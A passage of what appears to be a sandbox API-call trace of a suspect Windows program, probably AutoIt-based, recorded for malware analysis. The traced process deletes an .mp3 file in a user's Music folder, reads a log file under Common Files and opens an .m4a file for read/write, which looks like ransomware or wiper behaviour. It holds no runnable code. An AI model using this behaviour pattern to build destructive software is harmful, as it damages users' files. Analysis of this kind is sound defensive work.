0x88cef8 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0037.801] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.802] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.802] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.802] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.802] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.802] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.803] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.803] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.803] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpFilePart=0x0) returned 0x44 [0037.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x163ca820, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 0x7c2100 [0037.803] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\shi6u88nczyga2zyk.mp3")) returned 1 [0037.806] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb7a8e0, ftCreationTime.dwHighDateTime=0x1d5b970, ftLastAccessTime.dwLowDateTime=0x3da53760, ftLastAccessTime.dwHighDateTime=0x1d5b9b3, ftLastWriteTime.dwLowDateTime=0x163ca820, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x152c0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="SHI6u88nCZyGa2ZYK.mp3", cAlternateFileName="SHI6U8~1.MP3")) returned 0 [0037.806] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.806] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.807] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.808] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.808] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.808] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.808] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.809] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x22cc, lpOverlapped=0x0) returned 1 [0037.809] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x22cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.809] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.809] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.809] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.809] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.809] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.809] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.809] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0037.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.810] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.810] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899a0 [0037.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.810] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\z7Rh4U-493ioKt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\z7rh4u-493iokt.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.811] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.811] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.811] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.811] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.811] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.811] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0037.811] 